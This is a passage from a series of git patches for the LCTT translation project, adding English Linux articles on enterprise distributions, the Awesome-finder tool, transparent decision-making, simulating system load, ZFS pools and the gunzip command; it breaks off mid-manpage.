+Red Hat is a large, highly successful company that sells services around Linux. Basically Red Hat makes their money from companies that want to avoid vendor lock-in and other related headaches. These companies see the value in hiring open source software experts to manage their servers and other computing needs. A company need only buy a subscription and let Red Hat do the rest in terms of support.
+
+Red Hat is also a solid social citizen. They sponsor open source projects, FOSS advocacy websites like OpenSource.com, and the Fedora project. Fedora is not owned by Red Hat; rather, its development is sponsored by Red Hat. This allows Fedora to grow while also benefiting Red Hat, who can then take what they like from the Fedora project and use it in their enterprise Linux offerings. As things stand now, Fedora acts as an upstream channel of sorts for Red Hat's Enterprise Linux.
+
+### SUSE Linux Enterprise
+
+[SUSE][2] is a fantastic company that provides enterprise users with solid Linux options. SUSE's offerings are similar to Red Hat's in that the company focuses on both the desktop and the server. Speaking from my own experience with SUSE, I believe that YaST has proven to be a huge asset for non-Linux administrators looking to implement Linux boxes into their workplace. YaST provides a friendly GUI for tasks that would otherwise require some basic Linux command line knowledge.
+
+SUSE's core focuses are as follows:
+
+\- SUSE Linux Enterprise Server: This includes task-specific solutions ranging from cloud to SAP options, as well as mission-critical computing and software-based data storage.
+
+\- SUSE Linux Enterprise Desktop: For those companies looking to have a solid Linux workstation for their employees, SUSE Linux Enterprise Desktop is a great option. And like Red Hat, SUSE provides access to their support offerings via a subscription model. You can choose three different levels of support.
+
+### Why SUSE Linux Enterprise?
+
+SUSE is a company that sells services around Linux, but they do so by focusing on keeping it simple. From their website down to the distribution of Linux offered by SUSE, the focus is ease of use without sacrificing security or reliability. While there is no question at least here in the States that Red Hat is the standard for servers, SUSE has done quite well for themselves both as a company and as contributing members of the open source community.
+
+I'll also go on record in suggesting that SUSE doesn't take themselves too seriously, which is a great thing when you're making connections in the world of IT. From their fun music videos about Linux down to the Gecko used in SUSE trade booths for fun photo opportunities, SUSE presents themselves as simple to understand and approachable.
+
+### Ubuntu LTS Linux
+
+[Ubuntu Long Term Support][3] (LTS) Linux is a simple to use enterprise grade Linux distribution. Ubuntu sees more frequent (and sometimes less stable) updates than the other distros mentioned above. Don't misunderstand, Ubuntu LTS editions are considered to be quite stable. However, I think some experts may disagree if you were to suggest that they're bulletproof.
+
+Ubuntu's core focuses are as follows:
+
+\- Ubuntu Desktop: Without question, the Ubuntu desktop is dead simple to learn and get running quickly. What it may lack in advanced installation features, it makes up for with straightforward simplicity. As an added bonus, Ubuntu has more packages available than anyone (except for its parent distribution, Debian). I think where Ubuntu really shines is that you can find a number of vendors online that sell Ubuntu pre-installed. This includes servers, desktops and notebooks.
+
+\- Ubuntu Server: This includes server, cloud and container offerings. Ubuntu also provides an interesting concept with their Juju cloud "app store" offering. Ubuntu Server makes a lot of sense for anyone who is familiar with Ubuntu or Debian. For these individuals, it fits like a glove and provides you with the command line tools you already know and love.
+
+\- Ubuntu IoT: Most recently, Ubuntu's development team has taken aim at creating solutions for the "Internet of Things" (IoT). This includes digital signage, robotics and the IoT gateways themselves. My guess is that the bulk of the IoT growth we'll see with Ubuntu will come from enterprise users and not so much from casual home users.
+
+### Why Ubuntu LTS?
+
+Community is Ubuntu's greatest strength, both among casual users and in its tremendous growth in the already crowded server market. The development and user communities using Ubuntu are rock solid. So while it may be considered more unstable than other enterprise distros, I've found that locking an Ubuntu LTS installation into a 'security updates only' mode provides a very stable experience.
+
+### What about CentOS or Scientific Linux?
+
+First off let's address [CentOS][4] as an enterprise distribution. If you have your own in-house support team to maintain it, then a CentOS installation is a fantastic option. After all, it's compatible with Red Hat Enterprise Linux and offers the same level of stability as Red Hat's offering. Unfortunately it's not going to completely replace a Red Hat support subscription.
+
+And [Scientific Linux][5]? What about that distribution? Well, like CentOS, it's based on Red Hat Linux. But unlike CentOS, there is no affiliation with Red Hat. Scientific Linux has had one mission from its inception - to provide a common Linux distribution for labs across the world. Today, Scientific Linux is basically Red Hat minus the included trademark material.
+
+Neither of these distros are truly interchangeable with Red Hat as they lack the Red Hat support component.
+
+Which of these is the top distro for enterprise? I think that depends on a number of factors that you'd need to figure out for yourself: subscription coverage, availability, cost, services and features offered. These are all considerations each company must determine for themselves. Speaking for myself personally, I think Red Hat wins on the server while SUSE easily wins on the desktop environment. But that's just my opinion - do you disagree? Hit the Comments section below and let's talk about it.
+
+--------------------------------------------------------------------------------
+
+via: https://www.datamation.com/open-source/best-linux-distros-for-the-enterprise.html
+
+作者:[Matt Hartley][a]
+译者:[译者ID](https://github.com/译者ID)
+校对:[校对者ID](https://github.com/校对者ID)
+
+本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
+
+[a]:https://www.datamation.com/author/Matt-Hartley-3080.html
+[1]:https://www.redhat.com/en
+[2]:https://www.suse.com/
+[3]:http://releases.ubuntu.com/16.04/
+[4]:https://www.centos.org/
+[5]:https://www.scientificlinux.org/
From e7f72354ff6ecc18d0c90c945177ffac47938259 Mon Sep 17 00:00:00 2001
From: darksun
Date: Sat, 6 Jan 2018 12:36:51 +0800
Subject: [PATCH 069/371] =?UTF-8?q?=E9=80=89=E9=A2=98:=20How=20To=20Easily?=
=?UTF-8?q?=20Find=20Awesome=20Projects=20And=20Resources=20Hosted=20In=20?=
=?UTF-8?q?GitHub?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
...Projects And Resources Hosted In GitHub.md | 159 ++++++++++++++++++
1 file changed, 159 insertions(+)
create mode 100644 sources/tech/20170927 How To Easily Find Awesome Projects And Resources Hosted In GitHub.md
diff --git a/sources/tech/20170927 How To Easily Find Awesome Projects And Resources Hosted In GitHub.md b/sources/tech/20170927 How To Easily Find Awesome Projects And Resources Hosted In GitHub.md
new file mode 100644
index 0000000000..efdfc35ee3
--- /dev/null
+++ b/sources/tech/20170927 How To Easily Find Awesome Projects And Resources Hosted In GitHub.md
@@ -0,0 +1,159 @@
+translating by lujun9972
+How To Easily Find Awesome Projects And Resources Hosted In GitHub
+======
+![](https://www.ostechnix.com/wp-content/uploads/2017/09/Awesome-finder-Find-Awesome-Projects-720x340.png)
+
+Every day, hundreds of new projects are added to the **GitHub** website. Because GitHub hosts thousands of projects, searching for a good one can be exhausting. Fortunately, a group of contributors has made curated lists of awesome things hosted on GitHub. These lists group a lot of great material under different categories such as programming, databases, editors, gaming, entertainment and many more. That makes it much easier to find any project, software, resource, library, book or other item hosted on GitHub. A fellow GitHub user went one step further and created a command-line utility called **"Awesome-finder"** to find awesome projects and resources in the awesome series of repositories. This utility helps us browse the curated lists of awesome things without leaving the Terminal - and without using a browser, of course.
+
+In this brief guide, I will show you how to easily browse through the curated list of awesome lists in Unix-like systems.
+
+### Awesome-finder - Easily Find Awesome Projects And Resources Hosted In GitHub
+
+#### Installing Awesome-finder
+
+Awesome-finder can be easily installed using **pip** , the package manager for installing programs written in the Python programming language.
+
+On **Arch Linux** and its derivatives like **Antergos** and **Manjaro Linux** , you can install pip using the following command:
+```
+sudo pacman -S python-pip
+```
+
+On **RHEL** , **CentOS** :
+```
+sudo yum install epel-release
+```
+```
+sudo yum install python-pip
+```
+
+On **Fedora** :
+```
+sudo dnf install python-pip
+```
+
+On **Debian** , **Ubuntu** , **Linux Mint** :
+```
+sudo apt-get install python-pip
+```
+
+On **SUSE** , **openSUSE** :
+```
+sudo zypper install python-pip
+```
+
+Once pip is installed, run the following command to install the 'Awesome-finder' utility.
+```
+sudo pip install awesome-finder
+```
+
+#### Usage
+
+Awesome-finder currently lists items from the following awesome topics (repositories, of course) on GitHub:
+
+ * awesome
+ * awesome-android
+ * awesome-elixir
+ * awesome-go
+ * awesome-ios
+ * awesome-java
+ * awesome-javascript
+ * awesome-php
+ * awesome-python
+ * awesome-ruby
+ * awesome-rust
+ * awesome-scala
+ * awesome-swift
+
+
+
+This list will be updated on a regular basis.
+
+For instance, to view the curated list from awesome-go repository, just type:
+```
+awesome go
+```
+
+You will see all the popular Go projects and resources, sorted in alphabetical order.
+
+[![][1]][2]
+
+You can navigate through the list using the **UP/DOWN** arrows. Once you find the item you're looking for, choose it and hit the **ENTER** key to open the link in your default web browser.
+
+Similarly,
+
+ * "awesome android" command will search the **awesome-android** repository.
+ * "awesome awesome" command will search the **awesome** repository.
+ * "awesome elixir" command will search the **awesome-elixir**.
+ * "awesome go" will search the **awesome-go**.
+ * "awesome ios" will search the **awesome-ios**.
+ * "awesome java" will search the **awesome-java**.
+ * "awesome javascript" will search the **awesome-javascript**.
+ * "awesome php" will search the **awesome-php**.
+ * "awesome python" will search the **awesome-python**.
+ * "awesome ruby" will search the **awesome-ruby**.
+ * "awesome rust" will search the **awesome-rust**.
+ * "awesome scala" will search the **awesome-scala**.
+ * "awesome swift" will search the **awesome-swift**.
+
+
+
+Also, it automatically displays suggestions as you type at the prompt. For instance, when I type "dj", it displays the items related to Django.
+
+[![][1]][3]
+
+If you want to find the awesome things from the latest awesome- repositories (not using the cache), use the -f or --force flag:
+```
+awesome -f (--force)
+
+```
+
+**Example:**
+```
+awesome python -f
+```
+
+Or,
+```
+awesome python --force
+```
+
+The above command will display the curated list of stuffs from **awesome-python** GitHub repository.
+
+Awesome, isn't it?
+
+To exit from this utility, press **ESC** key. To display help, type:
+```
+awesome -h
+```
+
+And, that's all for now. Hope this helps. If you find our guides useful, please share them on your social and professional networks so everyone can benefit from them. More good stuff to come. Stay tuned!
+
+
+
+--------------------------------------------------------------------------------
+
+via: https://www.ostechnix.com/easily-find-awesome-projects-resources-hosted-github/
+
+作者:[SK][a]
+译者:[lujun9972](https://github.com/lujun9972)
+校对:[校对者ID](https://github.com/校对者ID)
+
+本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
+
+[a]:https://www.ostechnix.com/author/sk/
+[1]:data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7
+[2]:http://www.ostechnix.com/wp-content/uploads/2017/09/sk@sk_008-1.png ()
+[3]:http://www.ostechnix.com/wp-content/uploads/2017/09/sk@sk_009.png ()
From 85fefa9a6bb752db1c3598f3c04ca6ee31971bc5 Mon Sep 17 00:00:00 2001
From: darksun
Date: Sat, 6 Jan 2018 12:39:22 +0800
Subject: [PATCH 070/371] =?UTF-8?q?=E9=80=89=E9=A2=98:=20A=203-step=20proc?=
=?UTF-8?q?ess=20for=20making=20more=20transparent=20decisions?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
...s for making more transparent decisions.md | 81 +++++++++++++++++++
1 file changed, 81 insertions(+)
create mode 100644 sources/tech/20170928 A 3-step process for making more transparent decisions.md
diff --git a/sources/tech/20170928 A 3-step process for making more transparent decisions.md b/sources/tech/20170928 A 3-step process for making more transparent decisions.md
new file mode 100644
index 0000000000..80e4d294f6
--- /dev/null
+++ b/sources/tech/20170928 A 3-step process for making more transparent decisions.md
@@ -0,0 +1,81 @@
+A 3-step process for making more transparent decisions
+======
+![](https://opensource.com/sites/default/files/styles/image-full-size/public/lead-images/GOV_Transparency_A.png?itok=2r47nFJB)
+
+One of the most powerful ways to make your work as a leader more transparent is to take an existing process, open it up for feedback from your team, and then change the process to account for this feedback. The following exercise makes transparency more tangible, and it helps develop the "muscle memory" needed for continually evaluating and adjusting your work with transparency in mind.
+
+I would argue that you can undertake this activity with any process--even processes that might seem "off limits," like the promotion or salary adjustment processes. But if that's too big for a first bite, then you might consider beginning with a less sensitive process, such as the travel approval process or your system for searching for candidates to fill open positions on your team. (I've done this with our hiring and promotion processes, for example.)
+
+Opening up processes and making them more transparent builds your credibility and enhances trust with team members. It forces you to "walk the transparency walk" in ways that might challenge your assumptions or comfort level. Working this way does create additional work, particularly at the beginning of the process--but, ultimately, this works well for holding managers (like me) accountable to team members, and it creates more consistency.
+
+### Phase 1: Pick a process
+
+**Step 1.** Think of a common or routine process your team uses, but one that is not generally open for scrutiny. Some examples might include:
+
+ * Hiring: How are job descriptions created, interview teams selected, candidates screened and final hiring decisions made?
+ * Planning: How are your team or organizational goals determined for the year or quarter?
+ * Promotions: How do you select candidates for promotion, consider them, and decide who gets promoted?
+ * Manager performance appraisals: Who receives the opportunity to provide feedback on manager performance, and how are they able to do it?
+ * Travel: How is the travel budget apportioned, and how do you make decisions about whether to approve travel (or whether to nominate someone for travel)?
+
+
+
+One of the above examples may resonate with you, or you may identify something else that you feel is more appropriate. Perhaps you've received questions about a particular process, or you find yourself explaining the rationale for a particular kind of decision frequently. Choose something that you are able to control or influence--and something you believe your constituents care about.
+
+**Step 2.** Now answer the following questions about the process:
+
+ * Is the process currently documented in a place that all constituents know about and can access? If not, go ahead and create that documentation now (it doesn't have to be too detailed; just explain the different steps of the process and how it works). You may find that the process isn't clear or consistent enough to document. In that case, document it the way you think it should work in the ideal case.
+ * Does the completed process documentation explain how decisions are made at various points? For example, in a travel approval process, does it explain how a decision to approve or deny a request is made?
+ * What are the inputs of the process? For example, when determining departmental goals for the year, what data is used for key performance indicators? Whose feedback is sought and incorporated? Who has the opportunity to review or "sign off"?
+ * What assumptions does this process make? For example, in promotion decisions, do you assume that all candidates for promotion will be put forward by their managers at the appropriate time?
+ * What are the outputs of the process? For example, in assessing the performance of the managers, is the result shared with the manager being evaluated? Are any aspects of the review shared more broadly with the manager's direct reports (areas for improvement, for example)?
+
+
+
+Avoid making judgements when answering the above questions. If the process doesn't clearly explain how a decision is made, that might be fine. The questions are simply an opportunity to assess the current state.
+
+Next, revise the documentation of the process until you are satisfied that it adequately explains the process and anticipates the potential questions.
+
+### Phase 2: Gather feedback
+
+The next phase involves sharing the process with your constituents and asking for feedback. Sharing is easier said than done.
+
+**Step 1.** Encourage people to provide feedback. Consider a variety of mechanisms for doing this:
+
+ * Post the process somewhere people can find it internally and note where they can make comments or provide feedback. A Google document works great with the ability to comment on specific text or suggest changes directly in the text.
+ * Share the process document via email, inviting feedback
+ * Mention the process document and ask for feedback during team meetings or one-on-one conversations
+ * Give people a time window within which to provide feedback, and send periodic reminders during that window.
+
+
+
+If you don't get much feedback, don't assume that silence is equal to endorsement. Try asking people directly if they have any idea why feedback is not coming in. Are people too busy? Is the process not as important to people as you thought? Have you effectively articulated what you're asking for?
+
+**Step 2.** Iterate. As you get feedback about the process, engage the team in revising and iterating on the process. Incorporate ideas and suggestions for improvement, and ask for confirmation that the intended feedback has been applied. If you don't agree with a suggestion, be open to the discussion and ask yourself why you don't agree and what the merits are of one method versus another.
+
+Setting a timebox for collecting feedback and iterating is helpful to move things forward. Once feedback has been collected and reviewed, discussed and applied, post the final process for the team to review.
+
+### Phase 3: Implement
+
+Implementing a process is often the hardest phase of the initiative. But if you've taken account of feedback when revising your process, people should already be anticipating it and will likely be more supportive. The documentation you have from the iterative process above is a great tool to keep you accountable on the implementation.
+
+**Step 1.** Review requirements for implementation. Many processes that can benefit from increased transparency simply require doing things a little differently, but you do want to review whether you need any other support (tooling, for example).
+
+**Step 2.** Set a timeline for implementation. Review the timeline with constituents so they know what to expect. If the new process requires a process change for others, be sure to provide enough time for people to adapt to the new behavior, and provide communication and reminders.
+
+**Step 3.** Follow up. After using the process for 3-6 months, check in with your constituents to see how it's going. Is the new process more transparent? More effective? More predictable? Do you have any lessons learned that could be used to improve the process further?
+
+### About The Author
+Sam Knuth - I have the privilege to lead the Customer Content Services team at Red Hat, which produces all of the documentation we provide for our customers. Our goal is to provide customers with the insights they need to be successful with open source technology in the enterprise. Connect with me on Twitter.
+
+--------------------------------------------------------------------------------
+
+via: https://opensource.com/open-organization/17/9/exercise-in-transparent-decisions
+
+作者:[Sam Knuth][a]
+译者:[译者ID](https://github.com/译者ID)
+校对:[校对者ID](https://github.com/校对者ID)
+
+本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
+
+[a]:https://opensource.com/users/samfw
From 95d79336c10a076963bd3032c1b46734dde0cc96 Mon Sep 17 00:00:00 2001
From: darksun
Date: Sat, 6 Jan 2018 12:45:17 +0800
Subject: [PATCH 071/371] =?UTF-8?q?=E9=80=89=E9=A2=98:=20Simulate=20System?=
=?UTF-8?q?=20Loads?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
.../tech/20170924 Simulate System Loads.md | 81 +++++++++++++++++++
1 file changed, 81 insertions(+)
create mode 100644 sources/tech/20170924 Simulate System Loads.md
diff --git a/sources/tech/20170924 Simulate System Loads.md b/sources/tech/20170924 Simulate System Loads.md
new file mode 100644
index 0000000000..2808f9b4d5
--- /dev/null
+++ b/sources/tech/20170924 Simulate System Loads.md
@@ -0,0 +1,81 @@
+translating by lujun9972
+Simulate System Loads
+======
+Sysadmins often need to discover how the performance of an application is affected when the system is under certain types of load. This means that an artificial load must be re-created. It is, of course, possible to install dedicated tools to do this but this option isn't always desirable or possible.
+
+Every Linux distribution comes with all the tools needed to create load. They are not as configurable as dedicated tools but they will always be present and you already know how to use them.
+
+### CPU
+
+The following command will generate a CPU load by compressing a stream of random data and then sending it to `/dev/null`:
+```
+cat /dev/urandom | gzip -9 > /dev/null
+
+```
+
+If you require a greater load or have a multi-core system simply keep compressing and decompressing the data as many times as you need e.g.:
+```
+cat /dev/urandom | gzip -9 | gzip -d | gzip -9 | gzip -d > /dev/null
+
+```
+
+Use `CTRL+C` to end the process.
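+
+If you want to load every core at once, one approach (a small sketch assuming the `nproc` utility is available) is to start one pipeline per core in the background:
+```
+# Start one compression pipeline per CPU core, then wait.
+for i in $(seq "$(nproc)"); do
+    cat /dev/urandom | gzip -9 > /dev/null &
+done
+# Stop them all early with: kill $(jobs -p)
+wait
+```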
+
+### RAM
+
+The following process will reduce the amount of free RAM. It does this by creating a file system in RAM and then writing files to it. You can use up as much RAM as you need to by simply writing more files.
+
+First, create a mount point then mount a `ramfs` filesystem there:
+```
+mkdir z
+mount -t ramfs ramfs z/
+
+```
+
+Then, use `dd` to create a file under that directory. Here a 128MB file is created:
+```
+dd if=/dev/zero of=z/file bs=1M count=128
+
+```
+
+The size of the file can be set by changing the following operands:
+
+ * **bs=** Block Size. This can be set to any number followed by **B** for bytes, **K** for kilobytes, **M** for megabytes or **G** for gigabytes.
+ * **count=** The number of blocks to write.
+
+
+
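+When you have finished, you can release the memory again by deleting the file and unmounting the `ramfs` filesystem:
+```
+rm z/file
+umount z/
+rmdir z
+```
+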
+### Disk
+
+We will create disk I/O by first creating a file and then using a for loop to repeatedly copy it.
+
+This command uses `dd` to generate a 1GB file of zeros:
+```
+dd if=/dev/zero of=loadfile bs=1M count=1024
+
+```
+
+The following command starts a for loop that runs 10 times. Each time it runs it will copy `loadfile` over `loadfile1`:
+```
+for i in {1..10}; do cp loadfile loadfile1; done
+
+```
+
+If you want it to run for a longer or shorter time change the second number in `{1..10}`.
+
+If you prefer the process to run forever until you kill it with `CTRL+C` use the following command:
+```
+while true; do cp loadfile loadfile1; done
+
+```
+--------------------------------------------------------------------------------
+
+via: https://bash-prompt.net/guides/create-system-load/
+
+作者:[Elliot Cooper][a]
+译者:[lujun9972](https://github.com/lujun9972)
+校对:[校对者ID](https://github.com/校对者ID)
+
+本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
+
+[a]:https://bash-prompt.net
From 26031559eab8a3fd36dc6cd9031d133b048ff173 Mon Sep 17 00:00:00 2001
From: ChenYi <31087327+cyleft@users.noreply.github.com>
Date: Sat, 6 Jan 2018 12:53:24 +0800
Subject: [PATCH 072/371] apply for translation
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
28天前的文章,没人要我申领了
---
.../20171201 Launching an Open Source Project A Free Guide.md | 2 ++
1 file changed, 2 insertions(+)
diff --git a/sources/tech/20171201 Launching an Open Source Project A Free Guide.md b/sources/tech/20171201 Launching an Open Source Project A Free Guide.md
index 0d3fa9e18c..dd41e57813 100644
--- a/sources/tech/20171201 Launching an Open Source Project A Free Guide.md
+++ b/sources/tech/20171201 Launching an Open Source Project A Free Guide.md
@@ -1,3 +1,5 @@
+translating by CYLeft
+
Launching an Open Source Project: A Free Guide
============================================================
From 04f453a74f695bfbdd5cc6cdbedb944215691fea Mon Sep 17 00:00:00 2001
From: darksun
Date: Sat, 6 Jan 2018 13:07:42 +0800
Subject: [PATCH 073/371] =?UTF-8?q?=E9=80=89=E9=A2=98:=20How=20to=20Use=20?=
=?UTF-8?q?the=20ZFS=20Filesystem=20on=20Ubuntu=20Linux?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
... Use the ZFS Filesystem on Ubuntu Linux.md | 131 ++++++++++++++++++
1 file changed, 131 insertions(+)
create mode 100644 sources/tech/20170928 How to Use the ZFS Filesystem on Ubuntu Linux.md
diff --git a/sources/tech/20170928 How to Use the ZFS Filesystem on Ubuntu Linux.md b/sources/tech/20170928 How to Use the ZFS Filesystem on Ubuntu Linux.md
new file mode 100644
index 0000000000..8e0e9df7de
--- /dev/null
+++ b/sources/tech/20170928 How to Use the ZFS Filesystem on Ubuntu Linux.md
@@ -0,0 +1,131 @@
+How to Use the ZFS Filesystem on Ubuntu Linux
+======
+There are a myriad of [filesystems available for Linux][1]. So why try a new one? They all work, right? They're not all the same, and some have some very distinct advantages, like ZFS.
+
+### Why ZFS
+
+ZFS is awesome. It's a truly modern filesystem with built-in capabilities that make sense for handling loads of data.
+
+Now, if you're considering ZFS for your ultra-fast NVMe SSD, it might not be the best option. It's slower than others. That's okay, though. It was designed to store huge amounts of data and keep it safe.
+
+ZFS eliminates the need to set up traditional RAID arrays. Instead, you can create ZFS pools, and even add drives to those pools at any time. ZFS pools behave almost exactly like RAID, but the functionality is built right into the filesystem.
+
+ZFS also acts like a replacement for LVM, allowing you to partition and manage partitions on the fly without the need to handle things at a lower level and worry about the associated risks.
+
+It's also a CoW filesystem. Without getting too technical, that means that ZFS protects your data from gradual corruption over time. ZFS creates checksums of files and lets you roll back those files to a previous working version.
+
+### Installing ZFS
+
+![Install ZFS on Ubuntu][2]
+
+Installing ZFS on Ubuntu is very easy, though the process is slightly different for Ubuntu LTS and the latest releases.
+
+ **Ubuntu 16.04 LTS**
+```
+ sudo apt install zfs
+```
+
+ **Ubuntu 17.04 and Later**
+```
+ sudo apt install zfsutils
+```
+
+After you have the utilities installed, you can create ZFS drives and partitions using the tools provided by ZFS.
+
+### Creating Pools
+
+![Create ZFS Pool][3]
+
+Pools are the rough equivalent of RAID in ZFS. They are flexible and can easily be manipulated.
+
+#### RAID0
+
+RAID0 just pools your drives into what behaves like one giant drive. It can increase your drive speeds, but if one of your drives fails, you're probably going to be out of luck.
+
+To achieve RAID0 with ZFS, just create a plain pool.
+```
+sudo zpool create your-pool /dev/sdc /dev/sdd
+```
+
+#### RAID1/MIRROR
+
+You can achieve RAID1 functionality with the `mirror` keyword in ZFS. RAID1 creates a 1-to-1 copy of your drive. This means that your data is constantly backed up. It also increases performance. Of course, you give up half of your storage to the duplication.
+```
+sudo zpool create your-pool mirror /dev/sdc /dev/sdd
+```
+
+#### RAID5/RAIDZ1
+
+ZFS implements RAID5 functionality as RAIDZ1. RAID5 requires at least three drives; with three drives, you keep 2/3 of your storage space, and backup parity data is written to the remaining 1/3 of the drive space. If one drive fails, the array will remain online, but the failed drive should be replaced ASAP.
+```
+sudo zpool create your-pool raidz1 /dev/sdc /dev/sdd /dev/sde
+```
+
+#### RAID6/RAIDZ2
+
+RAID6 is almost exactly like RAID5, but it requires at least four drives instead of three. It doubles the parity data to allow up to two drives to fail without bringing the array down.
+```
+sudo zpool create your-pool raidz2 /dev/sdc /dev/sdd /dev/sde /dev/sdf
+```
+
+#### RAID10/Striped Mirror
+
+RAID10 aims to be the best of both worlds by providing both a speed increase and data redundancy with striping. You need an even number of drives, at least four, and will only have access to half of the space. You can create a pool in RAID10 by creating two mirrors in the same pool command.
+```
+sudo zpool create your-pool mirror /dev/sdc /dev/sdd mirror /dev/sde /dev/sdf
+```
+
+### Working With Pools
+
+![ZFS pool Status][4]
+
+There are also some management tools that you can use to work with your pools once you've created them. First, check the status of your pools.
+```
+sudo zpool status
+```
+
+#### Updates
+
+When you update ZFS you'll need to update your pools, too. Your pools will notify you of any updates when you check their status. To update a pool, run the following command.
+```
+sudo zpool upgrade your-pool
+```
+
+You can also upgrade them all.
+```
+sudo zpool upgrade -a
+```
+
+#### Adding Drives
+
+You can also add drives to your pools at any time. Tell `zpool` the name of the pool and the location of the drive, and it'll take care of everything.
+```
+sudo zpool add your-pool /dev/sdx
+```
+
+### Other Thoughts
+
+![ZFS in File Browser][5]
+
+ZFS creates a directory in the root filesystem for your pools. You can browse to them by name using your GUI file manager or the CLI.
+
+ZFS is awesomely powerful, and there are plenty of other things that you can do with it, too, but these are the basics. It is an excellent filesystem for working with loads of storage, even if it is just a RAID array of hard drives that you use for your files. ZFS works excellently with NAS systems, too.
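+
+One example of those extra capabilities is snapshots, which back the rollback behavior mentioned earlier. A quick sketch, assuming the pool created above (the snapshot name is arbitrary):
+```
+# Take a snapshot of the pool's root dataset, then roll back to it later.
+sudo zfs snapshot your-pool@before-changes
+sudo zfs rollback your-pool@before-changes
+```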
+
+Regardless of how stable and robust ZFS is, it's always best to back up your data when you implement something new on your hard drives.
+
+--------------------------------------------------------------------------------
+
+via: https://www.maketecheasier.com/use-zfs-filesystem-ubuntu-linux/
+
+作者:[Nick Congleton][a]
+译者:[译者ID](https://github.com/译者ID)
+校对:[校对者ID](https://github.com/校对者ID)
+
+本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
+
+[a]:https://www.maketecheasier.com/author/nickcongleton/
+[1]:https://www.maketecheasier.com/best-linux-filesystem-for-ssd/
+[2]:https://www.maketecheasier.com/assets/uploads/2017/09/zfs-install.jpg (Install ZFS on Ubuntu)
+[3]:https://www.maketecheasier.com/assets/uploads/2017/09/zfs-create-pool.jpg (Create ZFS Pool)
+[4]:https://www.maketecheasier.com/assets/uploads/2017/09/zfs-pool-status.jpg (ZFS pool Status)
+[5]:https://www.maketecheasier.com/assets/uploads/2017/09/zfs-pool-open.jpg (ZFS in File Browser)
From 4c146c68eac8e5f0dc6c424b4e41cb911b1b0d87 Mon Sep 17 00:00:00 2001
From: darksun
Date: Sat, 6 Jan 2018 13:09:40 +0800
Subject: [PATCH 074/371] =?UTF-8?q?=E9=80=89=E9=A2=98:=20Linux=20Gunzip=20?=
=?UTF-8?q?Command=20Explained=20with=20Examples?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
... Gunzip Command Explained with Examples.md | 100 ++++++++++++++++++
1 file changed, 100 insertions(+)
create mode 100644 sources/tech/20171002 Linux Gunzip Command Explained with Examples.md
diff --git a/sources/tech/20171002 Linux Gunzip Command Explained with Examples.md b/sources/tech/20171002 Linux Gunzip Command Explained with Examples.md
new file mode 100644
index 0000000000..cab0c84bd7
--- /dev/null
+++ b/sources/tech/20171002 Linux Gunzip Command Explained with Examples.md
@@ -0,0 +1,100 @@
+Linux Gunzip Command Explained with Examples
+======
+
+We have [already discussed][1] the **gzip** command in Linux. For starters, the tool is used to compress or expand files. To uncompress, the command offers a command line option **-d** , which can be used in the following way:
+
+gzip -d [compressed-file-name]
+
+However, there's an entirely different tool that you can use for uncompressing or expanding archives created by gzip. The tool in question is **gunzip**. In this article, we will discuss the gunzip command using some easy to understand examples. Please note that all examples/instructions mentioned in the tutorial have been tested on Ubuntu 16.04.
+
+### Linux gunzip command
+
+So now we know that compressed files can be restored using either 'gzip -d' or the gunzip command. The basic syntax of gunzip is:
+
+gunzip [compressed-file-name]
+
+The following Q&A-style examples should give you a better idea of how the tool works:
+
+### Q1. How to uncompress archives using gunzip?
+
+This is very simple - just pass the name of the archive file as argument to gunzip.
+
+gunzip [archive-name]
+
+For example:
+
+gunzip file1.gz
+
+[![How to uncompress archives using gunzip][2]][3]
+
+### Q2. How to make gunzip not delete archive file?
+
+As you'd have noticed, the gunzip command deletes the archive file after uncompressing it. However, if you want the archive to stay, you can do that using the **-c** command line option.
+
+gunzip -c [archive-name] > [outputfile-name]
+
+For example:
+
+gunzip -c file1.gz > file1
+
+[![How to make gunzip not delete archive file][4]][5]
+
+So you can see that the archive file wasn't deleted in this case.
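+
+Note that recent versions of gzip (1.6 and later) also provide a **-k** (or **--keep** ) option for gunzip that keeps the original archive without any redirection; check your local man page to confirm it is available:
+```
+gunzip -k file1.gz
+```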
+
+### Q3. How to make gunzip put the uncompressed file in some other directory?
+
+We've already discussed the **-c** option in the previous Q&A. To make gunzip put the uncompressed file in a directory other than the present working directory, just provide the absolute path after the redirection operator.
+
+gunzip -c [compressed-file] > [/complete/path/to/dest/dir/filename]
+
+Here's an example:
+
+gunzip -c file1.gz > /home/himanshu/file1
+
+### More info
+
+The following details - taken from the common manpage of gzip/gunzip - should be beneficial for those who want to know more about the command:
+```
+ gunzip takes a list of files on its command line and replaces each file
+ whose name ends with .gz, -gz, .z, -z, or _z (ignoring case) and which
+ begins with the correct magic number with an uncompressed file without
+ the original extension. gunzip also recognizes the special extensions
+ .tgz and .taz as shorthands for .tar.gz and .tar.Z respectively. When
+ compressing, gzip uses the .tgz extension if necessary instead of
+ truncating a file with a .tar extension.
+
+ gunzip can currently decompress files created by gzip, zip, compress,
+ compress -H or pack. The detection of the input format is automatic.
+ When using the first two formats, gunzip checks a 32 bit CRC. For pack,
+ gunzip checks the uncompressed length. The standard compress format was
+ not designed to allow consistency checks. However gunzip is sometimes
+ able to detect a bad .Z file. If you get an error when uncompressing a
+ .Z file, do not assume that the .Z file is correct simply because the
+ standard uncompress does not complain. This generally means that the
+ standard uncompress does not check its input, and happily generates
